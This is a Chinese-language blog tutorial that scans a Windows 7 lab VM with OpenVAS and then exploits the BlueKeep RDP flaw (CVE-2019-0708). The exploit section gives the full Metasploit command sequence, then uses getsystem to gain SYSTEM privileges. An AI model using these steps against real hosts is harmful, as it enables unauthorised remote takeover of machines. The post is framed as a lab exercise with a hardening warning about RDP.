漏洞掃描和漏洞攻擊
聲明:禁止用作非法目的,謝絕一切形式的轉(zhuǎn)載。
在這里對OpenVas進(jìn)行了簡單的介紹。這篇文章著重介紹通過OpenVas掃描出來漏洞之后,如何利用這些漏洞達(dá)到獲取被入侵機(jī)器"肉雞"的shell(也就是控制權(quán))。
OpenVas
GSM協(xié)議

NTP – Time synchronization ? Connecting to 123/udp ? Mandatory ? Not encrypted ? May use internal NTP server Feeds (see below) ? Direct
Connecting to 24/tcp or 443/tcp
Direct internet access required
? Via proxy
Connecting to internal HTTP proxy supporting CONNECT method on configurable port
? Connecting to apt.greenbone.net and feed.greenbone.net ? Mandatory on stand-alone and master appliances ? Used protocol is SSH ? Encrypted and bidirectionally authenticated via SSH
Server: public key
Client: public key


術(shù)語
Alert: An alert is an action which can be triggered by certain events. In most cases, this means the output of a notification, e.g., an e-mail in case of new found vulnerabilities.
CVE: Common Vulnerabilities and Exposures (CVE) is a dictionary of publicly known information security vulnerabilities and exposures.
QoD: The Quality of Detection (QoD) is a value between 0 % and 100 % describing the reliability of the executed vulnerability detection or product detection.
OpenVas掃描
通過"Configuration"設(shè)置掃描目標(biāo)(本文使用Vmware虛擬機(jī) Win7 64 SP1操作系統(tǒng)), 通過"Scan" 設(shè)置掃描任務(wù)。掃描結(jié)果如下:

查看nginx條目(Vmware虛擬機(jī) Win7 64 SP1操作系統(tǒng))報(bào)告信息:

從掃描結(jié)果中可以看出存在CVE-2019-0708漏洞,這是一個(gè)由微軟的RDP服務(wù)引起的任意代碼執(zhí)行漏洞,漏洞的詳細(xì)信息如下。

漏洞利用
開啟msf
msfconsole
搜索模塊
search cve-2019-0708
選擇攻擊模塊
use 1

選擇攻擊目標(biāo)
show targets
set target 2

設(shè)置遠(yuǎn)程目標(biāo)ip
set rhost 192.168.42.148

執(zhí)行
exploit

通過getsystem提權(quán)獲得最高權(quán)限system,然后就真的可以為所欲為了。
寫在最后
Win7系統(tǒng)的漏洞還是很多的,目前微軟已經(jīng)停止了對Win7系統(tǒng)的維護(hù),使用Win7系統(tǒng)要謹(jǐn)慎。當(dāng)然這并不能說明win10系統(tǒng)就安全了,漏洞也是多的可怕。
對于遠(yuǎn)程桌面,謹(jǐn)慎開啟。3389這個(gè)端口,無論在微軟的那個(gè)系統(tǒng)中,都是漏洞泛濫之地。
公眾號
更多內(nèi)容,歡迎關(guān)注我的微信公眾號:無情劍客。
